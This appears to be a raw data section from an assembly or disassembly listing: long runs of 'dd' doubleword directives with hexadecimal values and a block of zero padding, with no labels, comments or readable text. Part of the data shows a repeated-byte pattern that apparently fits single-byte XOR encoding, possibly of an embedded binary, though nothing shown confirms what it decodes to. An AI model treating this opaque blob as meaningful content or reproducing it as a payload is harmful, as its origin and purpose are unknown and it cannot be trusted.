dd 61E75A69h, 43396F6Dh, 5ED59B90h, 0DB04FFCCh, 366AFBE6h
dd 0E7B49528h, 6BA9295Dh, 510EB4A8h, 0BDEBE3E9h, 6191A047h
dd 0FA3FD5D7h, 60A62088h, 59FB6267h, 16B0CECCh, 8DC65051h
dd 0D8361515h, 0BD3CF772h, 3351D958h, 63C0362Fh, 935DE708h
dd 8DDC3E7Dh, 3064328Dh, 9318BBBAh, 0C43C1A71h, 5BC14D7Eh
dd 87CA80E5h, 0C9981341h, 28FF7473h, 769193FCh, 38F6E7D4h
dd 0D3C737E2h, 5D339983h, 0B7148E48h, 0C3F66C84h, 4959134Dh
dd 858A2A9Bh, 0F311ED65h, 484DE970h, 0A938682h, 0C15B590h
dd 882C5215h, 0CAC4FDBFh, 91295A6Ah, 880EB9FCh, 738C1E2Ch
dd 96D4FFD7h, 3600E1B5h, 6AB4F23Eh, 7E395DA7h, 0B5FEF045h
dd 0BEF0666Ch, 9C8998C3h, 35391679h, 61A616EEh, 427B5760h
dd 0AFD3CECDh, 739AEA7h, 22316892h, 3937F913h, 0AEAA35F2h
dd 6735D472h, 62659BD4h, 1C5772A0h, 65341652h, 4114FBD1h
dd 60D963F7h, 0D73852E2h, 33E6A4E2h, 0A9E04BD7h, 0F9790F23h
dd 5C5701EEh, 3D99E78Fh, 0DC519F4Eh, 2DC43CC0h, 67118ABBh
dd 4C56465h, 2CC2FE0Ch, 0B696C7BAh, 0EA7EE510h, 0B7D792B3h
dd 0E8BFA11Ah, 0D3F5DE0h, 6E7D9697h, 0E1190E94h, 4979D15Bh
dd 10C60C10h, 74A03A61h, 56307BF1h, 0D4EBE0E0h, 1A4BC3CAh
dd 0FD28CAF0h, 4BF18486h, 0BFC04A41h, 245FB4C2h, 81B52E0Eh
dd 62FC5C0Bh, 4477E904h, 720A98CEh, 9DC6F8B0h, 0EA2ABCB7h
dd 5C71BB47h, 0ACDE5551h, 8FAA6767h, 6A37246h, 1083F9F8h
dd 0C3F12588h, 82458B97h, 0AD526A1Bh, 0DC602AD0h, 0EEEA6063h
dd 0BAE8F6BCh, 84AE2426h, 6CBCDF90h, 0FEF4BEE6h, 34B1DEBCh
dd 68E722FAh, 0B345D88Ch, 0B0639338h, 0FFD87E63h, 57CFF0B5h
dd 0A509ED47h, 0C77DC3D9h, 7B0C9083h, 8367F1DCh, 0F021920Fh
dd 1231D37Ah, 40BD4A36h, 0C4966C96h, 25F84E4Eh, 0AE1C00ADh
dd 0B86AD0CAh, 1B49C907h, 0D9585DA5h, 169B7B8Fh, 93F05645h
dd 8D1BDDB5h, 40E92A1Bh, 5D160C08h, 37698E7h, 32244344h
dd 10DAAF81h, 0FB1A051Eh, 1DFF7245h, 290CAB00h, 714839F7h
dd 60A21818h, 5183097Dh, 95A5ADBh, 9503ABC8h, 73299CA1h
dd 0D9087E60h, 0CFCA5EE3h, 0A54D04B5h, 3BE06D75h, 921B2473h
dd 7070A121h, 4B0306E2h, 5065F8ABh, 0C9D51F72h, 0FDAF6C5Fh
dd 185D4191h, 61BA3031h, 699C12A3h, 192DCD72h, 0A851829Ch
dd 0F3FB512h, 5D28501Ah, 570D7547h, 0B4E45AC4h, 66B31C02h
dd 799222B3h, 578A8C85h, 19664CE1h, 266CE2E3h, 8948C484h
dd 0E3A3FAF2h, 418D1249h, 0C9F3B634h, 0F3C05F5Fh, 1394738Dh
dd 3057C1D7h, 0D81E09A7h, 0B30BBFB1h, 0EB1BB683h, 33AF9182h
dd 9DF33CC3h, 0DE010437h, 87F34948h, 5184FAF0h, 5D12B49Fh
dd 7127D3D1h, 26B2629Fh, 5C094FADh, 89DD15A3h, 6048CA8Dh
dd 2DAF1509h, 5D92076Eh, 6923B963h, 0F4C63699h, 8E349A87h
dd 0D50EFB18h, 0FC43D6Fh, 0F5891E04h, 1D446060h, 69AD3F13h
dd 0B45AF074h, 1D741840h, 8F834EB7h, 0C134F814h, 10FA787Bh
dd 0B0C107D6h, 95C73DD6h, 9B28421Fh, 57BB1C7Dh, 92F5F6Ah
dd 0AEC6C3F3h, 0FD1E94EEh, 529B7D84h, 0C0C2582Eh, 245FEFB9h
dd 82861C68h, 53A79B87h, 0C07AEFDDh, 276AE0F8h, 8153B338h
dd 141C9280h, 0FCD21DE0h, 0F129BD56h, 0E7B45D73h, 3FF87F7Bh
dd 38F68291h, 7E0ABDB8h, 6728D0D8h, 251B9EE6h, 2F584F0Ah
dd 5B6F30BAh, 988E2E47h, 16E271DCh, 0E627851Eh, 8673D9FAh
dd 2154CADEh, 0FD78AF26h, 83E97372h, 8BFCE3C4h, 0A7DA5050h
dd 0CF319957h, 8DACBF16h, 0A9D4935Fh, 1EF55B2Eh, 5B418787h
dd 0E709EF3h, 0E328E3EEh, 9092D75Dh, 8D0CBD36h, 0F3A5E09Ah
dd 578C03A5h, 1905E38Bh, 4D4EC4C2h, 68D0AECFh, 0DF21AB26h
dd 4BFF37E2h, 3C5C5B04h, 82871D1Ch, 53A28285h, 0A6FBF0DDh
dd 28A421CFh, 956E1E0h, 5EE295F9h, 0CCCF4546h, 81A4C2A9h
dd 71933907h, 5F9528ADh, 9C1303F9h, 6B67EDF0h, 1ADB7E38h
dd 0F728CB1Bh, 0E28AE781h, 0B699392Eh, 0F65ABA17h, 95B11709h
dd 5D930847h, 3FBC546Ah, 965ACBC9h, 77BBB2E5h, 0E17F92BCh
dd 91F96F6Eh, 8BFAC4AFh, 0DFEB3301h, 427680EDh, 80BF6C3h
dd 0A6A2D4E9h, 0DC41C0E7h, 7A03EB12h, 0E7886331h, 0B74A0C6Eh
dd 94B1BEFDh, 4CE727Ah, 0A56F0674h, 10C30FB8h, 69C4E1CFh
dd 0E33FF81h, 0D00EDA0Ch, 0C3BA6EDEh, 23E2C799h, 0CC33DD28h
dd 5C2F9904h, 0CE7BC1DDh, 10E9E9F9h, 7B3D8381h, 0DCABBF10h
dd 0F6004645h, 9ED263E2h, 0FE473538h, 4359E3E6h, 1132743Ah
dd 0BD68EEECh, 2679F833h, 927AF0A0h, 0DB66D281h, 0BBEE640Ch
dd 192F11C5h, 7D823D5Eh, 75659FF8h, 0CD8AEBD8h, 2266D9B2h
dd 0BC8552Fh, 19E7B50Ah, 0F47FF98Fh, 0C2DC6261h, 0DFBE5E32h
dd 0B35E943h, 0C781C7D8h, 1E529F53h, 12A378B8h, 0F24ECACAh
dd 0F83BE983h, 30615E6Eh, 96FA7074h, 77C6F6ABh, 8BCFB53h
dd 0A5C501Dh, 89AFC6F4h, 0FE018BFFh, 0D0200C03h, 0C57C6B5Ah
dd 6F42B26Fh, 8B91F07h, 0D1102D5Eh, 464CC2A5h, 1C47875Bh
dd 9F154A39h, 0EC2FA5A3h, 0FE46FAFDh, 844E5968h, 6A2790FBh
dd 6CD39897h, 2D9FECBh, 64388F8Eh, 3B4B5540h, 67BA191h
dd 0EB264E16h, 0CFCAA665h, 0F8EB6D7Ch, 12D14849h, 1FAF6F6Dh
dd 2D13849Ah, 0D65FEA7h, 2954C2C9h, 0B419BEA2h, 8DAF2228h
dd 0DC9E0F1Fh, 0E4DA4741h, 5CE5460h, 21ED8A81h, 7317BC84h
dd 6736DFEAh, 8040F8F2h, 0B46F2E21h, 0F78D3A2Dh, 0E4AE2223h
dd 19FD7F52h, 3CE26470h, 48028397h, 6F388199h, 9353DFC2h
dd 8D7BDAE5h, 9E8F0F02h, 0CDB93A1Fh, 0E0C85149h, 3F3605Eh
dd 1B189F86h, 412AA190h, 7156C7DCh, 9D61F2F0h, 0AC6B1407h
dd 0DF8D2E38h, 0DD9A4F54h, 72DC6D72h, 0CFB0AFh, 7338A189h
dd 7B228C9Ch, 955FCDD0h, 8B52F0E2h, 0D294080Fh, 0DD8E3B30h
dd 1AC6585Dh, 5C07867h, 2D1E9E98h, 5C1D92A2h, 7456C3DEh
dd 0BC1AE2F5h, 0AC9B0013h, 0D9B11C27h, 8BC23640h, 1EF74815h
dd 3CF32979h, 5D0DA2B7h, 7931D594h, 844AF2EEh, 0B861501Fh
dd 0F9EA0F06h, 0B8870108h, 12D44A45h, 3EF36976h, 7922B2EEh
dd 543EE894h, 207DE0E7h, 907DFCACh, 0C9C51918h, 0A4D8A618h
dd 4E7302Eh, 56BCF4E2h, 27F835F0h, 2A5EE4C7h, 2012204Bh
dd 6E196A6h, 0BA530C67h, 5051D144h, 0CBC60C10h, 68622B0h
dd 6B0899D7h, 141FFD20h, 35BA7C4Ch, 8DA7A293h, 0BBABD387h
dd 0B075EBC2h, 10D27863h, 0B09F1EACh, 271FF60Ah, 0BD396111h
dd 0C7597F36h, 0F88C2260h, 811AA0BDh, 0CAFC7377h, 924BAB02h
dd 65C00619h, 6DA2189Fh
dd 5A2A7C7Ah, 5B34DAE9h, 0EC4BD1BBh, 0C50AD508h, 0F374FD7Fh
dd 0C99F6469h, 99CC4AAAh, 39E87723h, 17DC422Ah, 20E418E5h
dd 1452F8EBh, 6B27DD69h, 8BFCDA89h, 3B099394h, 95F397DBh
dd 0F27AB52Fh, 8F4CED12h, 497DF3FAh, 741D9280h, 4911E6FAh
dd 1020DADBh, 0E12E65ECh, 4BA5B25Bh, 264BC3C3h, 749832E2h
dd 5688FB96h, 0AD95B6E0h, 1A7BEDE3h, 0FC2CAF4Ch, 8C4AD886h
dd 0EDB53021h, 0F497141Ah, 7EE22A69h, 52BDE59Eh, 447005ECh
dd 6E04CECEh, 5B6DFCFFh, 7FE5C692h, 0CBCC599Dh, 0FD8F9D66h
dd 0E791355Ch, 6EA27016h, 0AFD5B9F8h, 24F2B4Fh, 0EBBD38BCh
dd 7B76BFEAh, 0E8248115h, 2267ED62h, 0F0CC7264h, 61C67624h
dd 0D900605h, 4BE418B6h, 0DF52F8E4h, 3218643Fh, 0E41F628Ch
dd 96A36C6Eh, 94EB1C0Ah, 0CBF6741Eh, 2909ED11h, 0A27DC3DEh
dd 2C5ED4DEh, 7C4FC6C1h, 9654F8F1h, 2D52783Bh, 83CF83C9h
dd 7143B53Dh, 7AA82E35h, 50472CEh, 0B06AD0F8h, 2B673646h
dd 68D3F3A5h, 0DF3EA8C6h, 0C0F40EFAh, 145F484Ah, 82843374h
dd 0BE2B8155h, 0AD77DDC1h, 0D8A73C33h, 0ADBC68D7h, 0EB1AA0B3h
dd 6A59F125h, 0ADDE6476h, 0AEA4A3BAh, 3BF21828h, 51E9F893h
dd 3366B289h, 80BA3BBDh, 0F716B07Eh, 0AC52BE04h, 2D67ED41h
dd 0C9CC7264h, 0C923224Fh, 5DA026A2h, 6F21B1B3h, 0B4AD9A98h
dd 303854Eh, 388175D5h, 0F65C43h, 97F6B0D5h, 0E6523031h
dd 9663EDE0h, 7B6F8E7Eh, 61DB13D5h, 593F85A2h, 1913C9CDh
dd 2CFD8A22h, 0A1A8DF9Ah, 0C1903C0Eh, 3C402A40h, 9075FFF2h
dd 97EAD64h, 443494C3h, 0F164B91h, 5AC87A78h, 0C0C17225h
dd 0F5A52C1Ch, 738E218h, 63A73D43h, 1429BFBCh, 76089E9Fh
dd 250F254Eh, 7EE491A3h, 0CCCD5F58h, 0D8C0BD97h, 8ECDDF43h
dd 27F01918h, 1C5ADB5h, 7F21F592h, 80B9BCF1h, 0F717B1DEh
dd 0D9097369h, 0E9A33263h, 0FA9B3721h, 3DCA5049h, 0C86E5706h
dd 3F42C33Eh, 0DEE6445Ah, 6B349A87h, 0E5158B45h, 39F70739h
dd 97F556C5h, 5A2EBC31h, 0E49D230Dh, 7B53334Eh, 7A0D83D5h
dd 24A52348h, 35A297A9h, 3C96F477h, 0E4E56B42h, 0C3C65769h
dd 76AB774Dh, 84748100h, 0C696FF09h, 29F0403Ch, 0FD2E94B0h
dd 57788DF3h, 3FF2687Ah, 91F823DFh, 82BAC42Bh, 30CF0E0Ch
dd 7632ACA2h, 6B1EFEFDh, 9CC4B1FDh, 0EB2CBED2h, 0CCF91CE6h
dd 186D5656h, 8EF22081h, 0C2199741h, 0B985CBD5h, 0CC992D57h
dd 1547B155h, 0B961C99Fh, 8D4FCEC8h, 0F6A0264Dh, 0DA5BBB44h
dd 0F9B01609h, 681607C6h, 0AC73E9E5h, 2154CFA1h, 0F78026ABh
dd 0BC16BC95h, 0EA31D3E2h, 0F2325060h, 0B43CDC0h, 59B2D9AFh
dd 0CF70F5F3h, 2D60D4C5h, 0ED15B36h, 99769899h, 0D3047B7Ah
dd 984BC9A2h, 51493E0Eh, 76AA218Fh, 3D588950h, 0AC92B1E1h
dd 1B7EE80Eh, 88766520h, 0CC99EF8Ah, 550C6969h, 0A1E56723h
dd 3F34CFC0h, 63A92FAAh, 0C85385EDh, 177B7B4Ah, 9CC3E2B1h
dd 0EB2DBF2Ah, 48F0B5F0h, 0ADE156DFh, 5CF79BCh, 0E095E418h
dd 61A65A7Ch, 0CDE21BDBh, 14488E93h, 0F6439FF5h, 4CF483EBh
dd 0BADD4FA6h, 9430BDC7h, 7CB047A1h, 0C81E9A06h, 3F44CA45h
dd 7207DBA3h, 2F833954h, 25928DBDh, 0C7B9EA60h, 1A565150h
dd 888D13F5h, 18771DA3h, 237F0905h, 2D61D741h, 86A493E9h
dd 0E77BDADh, 0E3294AEEh, 665AD05Dh, 24C90F1Eh, 80F9C91Eh
dd 0C200FCFFh, 395EC45Eh, 0F27C5A9h, 0AF30A6A5h, 1E8777D4h
dd 4DF45A45h, 2CC2680Eh, 0B28861BEh, 0D595400Ch, 613F7AE7h
dd 2FBC13DBh, 1B3CF9B3h, 0A10C96D9h, 0E9447D76h, 0A103D85Fh
dd 0DECCDAF9h, 60825812h, 0DFD7CF05h, 4442161h, 165557BEh
dd 0D60FA0A0h, 0F42CFAB4h, 81CE4A44h, 0B2F56360h, 597501Eh
dd 54E72F27h, 0E3CA4A2h, 0DD01CCEAh, 341C4839h, 4ADC0F8Eh
dd 0ADFA7070h, 0FB8B0251h, 0A57FA1CDh, 0E72B1623h, 4CB1E2C6h
dd 3581D8BCh, 414E70D3h, 0F2249F72h, 0B0235A7Ch, 4ABF5E54h
dd 0A6E1A5AAh, 7B68A120h, 3085EF51h, 3A6FE5EAh, 3C887B49h
dd 0AD66A796h, 0CCD21C77h, 1706B5Ah, 175A1935h, 838903D3h
dd 71A9B48Eh, 0CB7CF2DEh, 18732D5Dh, 60F09FB2h, 0BF49C494h
dd 0E2BCE289h, 57605968h, 1EA4539h, 0C42AE391h, 53B8D204h
dd 9B9BD26Dh, 0FF2AD0CAh, 6D457FBh, 381AF1E2h, 0BD98E86Ch
dd 525AADADh, 0C33EE70Ch, 5FA527F7h, 0B6F1481Ah, 0DC047420h
dd 35141F38h, 88A40F8Fh, 0C9FB4164h, 99B57926h, 75BF3546h
dd 5B8D7E81h, 0B33F78F5h, 2F63E9F9h, 9483ABCDh, 0F315BB3Dh
dd 0D5077D7Dh, 9817DA99h, 7ECB4170h, 8752DD29h, 598BC75Fh
dd 158F536Eh, 0E207C7F5h, 0CF1EA532h, 1EEC0989h, 0C24DE864h
dd 26514E4Ch, 848A002Eh, 9ACA1264h, 7751AE7Ah, 269E51D1h
dd 0B3F1137h, 0BDE0BD95h, 9F011227h, 0B08C5B33h, 0C7063C3Ah
dd 59598BE4h, 0AC0AFFCCh, 4EEEF21h, 914BC1C4h, 0CA1CA527h
dd 0D7830984h, 30F05656h, 0AEE25BD2h, 15E67B28h, 0F5695C09h
dd 4247C1FFh, 2BA7364Fh, 63DAF2Ah, 171AFA90h, 0F9CC75C7h
dd 0BB4BAB53h, 8C00618h, 0E8ADE7EDh, 4E83FA1Fh, 7F5F51h
dd 0DB76BB8Ah, 0A4775F9Fh, 870C142Fh, 87EDD59Fh, 0D334271h
dd 799E0FD7h, 0DE9FC686h, 3C71E421h, 9BDB01F5h, 399B7h
dd 8A45DBDBh, 0C3F96C73h, 0E14DB11Dh, 0BA0002h, 18181DCFh
dd 0C17DF3F3h, 1A6EF757h, 47B476B4h, 8E732EAEh, 2317878h
dd 40139B59h, 174FDDCCh, 73982E33h, 0EDB5B476h, 376AFB13h
dd 0D84813F2h, 1ADB5354h, 0ED29010Ch, 0B1336657h, 66D403FFh
dd 0D3391CCAh, 22210312h, 0AA7EEFFh, 26700FA6h, 58032E7Fh
dd 1074F9E6h, 49B56C07h, 0D9DF582Eh, 0B08BBDEAh, 6EB65A9Dh
dd 0B0EE9B5h, 0E8932591h, 967E7A98h, 0F516AC86h, 938327BCh
dd 30636C45h, 99CC42FAh, 4B6DE410h, 6BBE3136h, 0C5FD7CBh
dd 542686E7h, 715FC7DBh, 8D7DA4EAh, 0CEFB030Bh, 0C3B1726Dh
dd 0E3D7515Dh, 4EE6130h, 3D15D1CCh, 464A4A7h, 464BFB9Ah
dd 9F4CF8E5h, 0BF6B5618h, 0C0CB353Dh, 0FAF9135Fh, 548A2F20h
dd 22ED9689h, 185BDD88h, 7D22A4AAh, 0CD11D6CCh, 0A77AF7A6h
dd 9DCD0304h, 0C4A0272Bh, 0B18E584Fh, 4DAA3229h, 25058B85h
dd 2B66ABA3h, 83C724BAh, 0DA2A8B1Fh, 48B2C274h, 22C50BCh
dd 0B2413F43h, 0D05363h, 0DB400D8Dh, 29E95124h, 0A4458B8Ch
dd 0F3CF1FA2h, 367DD072h, 0CCC55FE2h, 9B8BC9B4h, 0A471FB01h
dd 13D23BDAh, 0D604BEA2h, 0C8ACE387h, 233AB86h, 0E414D2E4h
dd 341E376Eh, 0D227B1B2h, 9C37BB10h, 0E59C2221h, 8556F2C6h
dd 1F62599Ah, 899B464Bh, 0F15E1B41h, 0F5B7CDF7h, 40185A6Ch
dd 5B4DFF99h, 0C82515F5h, 57B9D100h, 0AB56B1Dh, 7A776D0Ah
dd 8710A4D7h, 0FF2286F0h, 0B4AC5AC3h, 0D5FC74A6h, 0F7B416F6h
dd 0E8ABEFE4h, 16F22BECh, 2758FEFFh, 4C61EA8Ch, 0D628E493h
dd 0CCAE3126h, 52FB7F22h, 0B3C0C9C8h, 6FEF4C50h, 1BEEB8Dh
dd 47648A93h, 460486B6h, 72299CCFh, 26F780C0h, 8AB9E59Dh
dd 0A8274274h, 8350BBCCh, 60938DF9h, 7C3FAEB0h, 0DF754CC6h
dd 540E5654h, 0EA5ADFCEh, 390870EBh, 0E48F73AFh, 0CB50202h
dd 9663EC03h, 1F2EA3CEh, 2BDADB9Ah, 3CC04A49h, 0C0E7E42h
dd 570D8784h, 4B1BA7A4h, 832EEE0Dh, 9EA81E1Fh, 0A875FE59h
dd 396BE109h, 0F6CD9FC3h, 0FD1D8A9Ch, 0DF0EB76Eh, 0F20E0369h
dd 91F0FCC1h, 0BD12B1Bh
dd 302A8D2Eh, 4478DEDDh, 89B1C5BAh, 0E0C54F4Fh, 0EB1B9080h
dd 81C3F213h, 0A55A5A0Ch, 5C13736h, 0B1A02546h, 1BF7B9Fh
dd 0CBE0D49Eh, 0E246BCBDh, 0D7278BDCh, 5C067F81h, 0BAEB6188h
dd 999100B2h, 7C4EA12Ah, 23100706h, 1F52C8C7h, 0F5D7C6E9h
dd 0EB34AAABh, 1AEA762Ah, 0C63EEF60h, 0E5524F50h, 98F1BA39h
dd 6DEED239h, 4E9534C0h, 67D61DD6h, 24C53FA7h, 1921A7A9h
dd 2CFC842Dh, 0B4E5F4B5h, 0B25AB63Eh, 75A92F2Fh, 67BB2A9Dh
dd 0C5020AE1h, 9F423C3Ch, 0FD2EA42Ah, 0EF33330Ch, 9E796859h
dd 490A4976h, 7D49D17Ch, 2919737Eh, 45798FC9h, 71A45B2Fh
dd 842FCBB2h, 0DB0C9226h, 0DC847775h, 0ADE6A5EFh, 2B316F37h
dd 6D471BA9h, 0FDA5F0Ah, 0A157D389h, 15C53A30h, 7E4E9E9Fh
dd 26F51B11h, 5F3C8A9Ch, 1094BBBBh, 36B32A6Fh, 5BD38516h
dd 0B65BAACCh, 2154954Eh, 23736CABh, 0C536ACADh, 4DD025E6h
dd 2251401Ah, 888C0216h, 1A965E2Bh, 43357CF0h, 0AE7094D4h
dd 8441EFD4h, 0C112B71Ch, 0DB467B7Bh, 87B61F5Ch, 0B7435AECh
dd 2EA8AF7Bh, 678BBF83h, 366DE3D1h, 0E4B25047h, 0DE9A5A5Ah
dd 2011B7B7h, 0F0DF04FCh, 0BE60B44Ah, 7DB71D1Bh, 53B2C299h
dd 4EF77DEDh, 0AA5BE1FFh, 390CA124h, 814FC293h, 0CB4A8A75h
dd 52E16766h, 0BEEF5CA2h, 6810E418h, 0AE86CCC9h, 34C104Eh
dd 0EAFD33BDh, 829AFB1h, 0E93B8234h, 2F123563h, 9BFF6919h
dd 4CB682A6h, 9E930936h, 3F74EA0Fh, 203F96C9h, 29DB412Ah
dd 154F8DBDh, 0BE7CAE60h, 22DB6145h, 403EF0F1h, 0A890E5EDh
dd 7B958E76h, 3D5C14D5h, 7A4292B7h, 8DA2FF85h, 0A269775Fh
dd 5C874E28h, 6A36C0FAh, 2D43246Ah, 0BF72FCFDh, 0C6911B33h
dd 36B0EBA2h, 0EF04F0DDh, 0DF12A83Fh, 651C0A69h, 0D429B3B5h
dd 0A6FCA512h, 9C2F9D3Ch, 0CE7BC1C3h, 0A63ADA9Fh, 7A3FB58Bh
dd 0EB76C2B6h, 46008975h, 0FCE23293h, 2651C568h, 0F3A62C35h
dd 6C06F53Eh, 6857E180h, 0D0CABCCBh, 52248A4h, 0A5E47D7Dh
dd 0DA119B9Bh, 9CB4FE86h, 0CC592826h, 5E9423BFh, 406503E8h
dd 294CCCAh, 40715ACh, 0E5F08E8Eh, 5FA7070h, 0FC515275h
dd 0A7733816h, 16A0EE90h, 4C6997EDh, 0A562D8D6h, 4D739DECh
dd 1FA58011h, 0D43657CBh, 4A0659B6h, 920821C0h, 150Dh dup(0)
dd 0B4B49C44h, 0B83FB4B4h, 0DF34ABD8h, 0B4B4B4D8h, 3D34B4B4h
dd 0B4DD604Ch, 0D8103FB4h, 0B0E128B8h, 64643D0Dh, 3DB4B4DDh
dd 0B4DD686Ch, 0E36C34B4h, 9CB4B4D8h, 4CB7C129h, 0B4B4D8E4h
dd 0B3B60F3Fh, 3FBC9FE7h, 0B4D8E54Ch, 0FE7B3B4h, 20354909h
dd 24BAB8D8h, 9735B4B4h, 0B3B3A4B4h, 0C4BAA135h, 303FB4F4h
dd 6941B8D8h, 0B4F4E8F0h, 0B4B41D6Dh, 3558A7B4h, 1C08022Fh
dd 0C129271Dh, 41F0F73Fh, 351ACCB8h, 28F904ECh, 0B49F35BCh
dd 29B4B4B5h, 2C043F96h, 263F87B7h, 0CCFE3FD4h, 6105A7B7h
dd 2C3577B7h, 19FBB4B3h, 35CF2928h, 2604B72Ch, 0C6291723h
dd 0F5BB2C35h, 29261818h, 0BF2C35BDh, 0B4272719h, 8B96B928h
dd 0DD77110Dh, 263FD8C0h, 0A7B70DD8h, 2B86BC3h, 0B7D02E3Fh
dd 3BE83FAFh, 0C09CA7B7h, 0F7B4B4B4h, 19272320h, 182215FCh
dd 7B41920h, 393D8AB3h, 0B4F4E9F0h, 0B4B4C19Ch, 1926F7B4h
dd 0F9192815h, 2822192Ah, 0B307B4F5h, 0F4393D8Ah, 9CB4F4E9h
dd 0B4B4B4C1h, 2819FBh, 0F9282715h, 26232626h, 8AB307B4h
dd 0E9F8393Dh, 249CB4F4h, 39B4B4B4h, 4D52874h, 0E9F849B3h
dd 7439B4F4h, 3941C429h, 0B4F4C586h, 9CB3043Eh, 0B4B4B422h
dd 49B3309Fh, 0B4F4E9F0h, 0E8E539ABh, 0B4B4B4F4h, 0D22834B4h
dd 0E8E96941h, 303FB4F4h, 5958B8D8h, 0ED66513Fh, 693FB4F4h
dd 0B4F4ED6Ah, 0ED6E713Fh, 7711B4F4h, 1EB41E0Eh, 1EB41EB4h
dd 0B4B51CB4h, 783FB4B8h, 1E04B41Eh, 0B3783FC0h, 13080A96h
dd 0E7B4B4E7h, 0B38E9C7Dh, 4941B3B3h, 0B4F4C555h, 4050506h
dd 0E9F449B3h, 7837B4F4h, 0A63E77D4h, 0B4D6136Dh, 0F4C4E4B4h
dd 0AD968AB6h, 0A9DF5C77h, 0A4BC692Ch, 0C801774Ch, 0E43C54E1h
dd 7954D90Fh, 0AF7CD4ECh, 410A551h, 8E75076Ch, 933C650Dh
dd 64259231h, 0F5EE274Ch, 0A6CEA384h, 85DF16CCh, 0E4A512A1h
dd 0FB3AD6CCh, 57BF9932h, 8D5DB4CCh, 64319C01h, 0DF11814Ch
dd 0B73C54E1h, 3C49C1C5h, 757C1401h, 0C7EADCBAh, 30B146Ch
dd 0C4514881h, 0A35415ACh, 44F0784Bh, 2BB794ECh, 871C9E80h
dd 147CFC6Fh, 49957CCCh, 64FC099Ch, 47582E4h, 0C3FC7EACh
dd 84913CC1h, 0F3FC19ECh, 0E38A2510h, 79F96B3Bh, 0C4DC84CCh
dd 786543E7h, 855CB406h, 640C54C9h, 0C731814Ch, 773C54DEh
dd 77E3331h, 40F7B448h, 840F7C26h, 4151A195h, 575CF4F6h
dd 2D68DF07h, 8BCA0483h, 0E7946BD8h, 0E3DC358Ch, 0E4B124A1h
dd 0E460F7CCh, 0E8BB54F1h, 630BB2AEh, 4EFC7E23h, 489CDC4Dh
dd 0E49414ECh, 0E3DC358Ch, 0E4B124A1h, 0D35CF9CCh, 3AA99F0h
dd 0B45C1E5Bh, 0A8FC5444h, 59CDE4Ch, 0E93A084h, 85F4848Dh
dd 437CD52Ch, 4114441h, 64B6BC6Ch, 790BB40Dh, 0A4BC495Ch
dd 449CF924h, 8290BDECh, 84F633DBh, 0CE7677D5h, 60B1F3C6h
dd 0FBCD441h, 0A1DF775Dh, 0A4BC493Ch, 5B20034Ch, 8C2BD37Ah
dd 84DC3492h, 0F04028EAh, 394B7408h, 64FC09E4h, 0FB8F6989h
dd 0ED2F546Ch, 59ECB1C9h, 0EFED942Ch, 86221CFFh, 81FFD42Ch
dd 0C4DCA994h, 6740236Ch, 8F0BB35Ah, 64312831h, 454C734Ch
dd 0B7D1196Bh, 957344Ch, 243CC944h, 531D649Bh, 0A4EF36F1h
dd 3CE13F0Ch, 0C3FC9481h, 0C91BF59Ch, 0E47C8785h, 99A8C107h
dd 2DDFD4ECh, 531D659Bh, 0A4EF4AF1h, 610E9C0Ch, 17913BBh
dd 445C2A8Ah, 0E496E367h, 548B0DE2h, 27DD5730h, 9D1F3426h
dd 8EBCBEA3h, 83D141F4h, 0FDFC94A1h, 449CF438h, 0E8B9E867h
dd 0E38B3249h, 0B117FA3Bh, 0C41C41D0h, 0CF22146Ch, 0AF60FB89h
dd 4A98F87Eh, 0AEC756E7h, 0DFA3CECh, 0D057348Ch, 68F7D4C6h
dd 0C4B47426h, 8EB4146Ch, 0EEAE05CCh, 196BA4AAh, 445C292Ch
dd 24001714h, 84F50264h, 0CED05F2Ch, 2E58FFCCh, 8EBCBEACh
dd 476060Eh, 0A4D52244h, 759CDE4Ch, 838CD306h, 44D11801h
dd 0A945332Ch, 0EBA0839Bh, 0F1AB53F9h, 0C46CB4A1h, 0AEF0CDACh
dd 3317F44Ch, 91BDF97Fh, 841C448Ch, 183859A9h, 0A44B740Ch
dd 5C9CA9E9h, 63AEB4CCh, 6431F021h, 44B25C4Ch, 137894ECh
dd 54119F6Bh, 0BA5506DCh, 2BC16025h, 901DEA91h, 49D19E1h
dd 6C91135Ch, 0CD9CB461h, 24716071h, 6E30848Ch, 43EBFE0Ch
dd 411E041h, 0A37C996Ch, 0EEF2F3E1h, 2FD2AAAEh, 769DDE00h
dd 0E43CA584h, 4801878Ch, 0CB71F6D1h, 1AB566FCh, 8B21C085h
dd 63B2B4F1h, 6431A021h, 7AE07F4Ch, 1A8C6A22h, 0B4713343h
dd 0A77C1401h, 0A3F38490h, 0A4F110E1h, 0EE5C1E0Ch, 349113AEh
dd 0DD9CB461h, 0E43C95C4h, 0D7D5F03h, 0DB50B828h, 0D978099Bh
dd 0FAEF14ACh, 1A48598Fh, 58FC546Ch, 0D4317383h, 693C54C1h
dd 4A28A8CCh, 0B68092AFh, 0E8D0F3AAh, 8EBCBE64h, 0ACF1B326h
dd 29FC9481h, 0B7E8E80Ch, 0E4409184h, 0F595678Ch, 0A9A5C44Fh
dd 0C4DCAAD8h, 253DFC81h, 45CC1AAh, 5ACCA85Ch, 776CC47Dh
dd 0B994297Bh, 0C461344Ch, 437B08D5h, 53149820h, 0A4F210F1h
dd 61B89C0Ch, 0C3CF13BBh, 849130C1h, 65C4BFECh, 84DD5CD0h
dd 99EB2B2Ch, 0C4DCA9D8h, 3A73905h, 495415Bh, 0A4C4AC54h
dd 449C1D0Ah, 0E43CA111h, 84DC348Dh, 247CD42Ch, 0C41C74CCh
dd 30FEA9Dh, 0C451FC81h, 10C5BFACh, 1F5134D0h, 20FFC28Eh
dd 690F954Eh, 0C959F5EAh, 2EBE4330h, 7730B791h, 164F0BB8h
dd 36D5AA5Bh, 0B09CE9A0h, 10AE48FFh, 47DCA271h, 0B85DF9BEh
dd 30B53A31h, 0A7BCD591h, 0D87D19DEh, 50D59A51h, 943DC1B1h
dd 0B9A3DFCh, 561F344Dh, 0C970F5D1h, 27BB66FCh, 0A52FC791h
dd 0E98EF70Ch, 56E1884Dh, 983BE1B1h, 0F6946811h, 84009571h
dd 0C56106EFh, 2CF05920h, 881DB97Eh, 0E98EF70Ch, 58E1884Dh
dd 0AC38E3ABh, 0B7AC4011h, 65FA879Eh, 0D35407BCh, 1CE17420h
dd 8C10C885h, 0E87D19DEh, 50D59AACh, 0B135C8B1h, 179B6811h
dd 6910A755h, 0D15528C9h, 29E37431h, 9015DA80h, 0D890F5F1h
dd 39DE7D3Eh, 854FD9A0h, 0F8A15BECh, 69F89D52h, 0C966FDDFh
dd 18C13BCCh, 8918BDB2h, 0E9791DC0h, 38E19BACh, 9940E389h
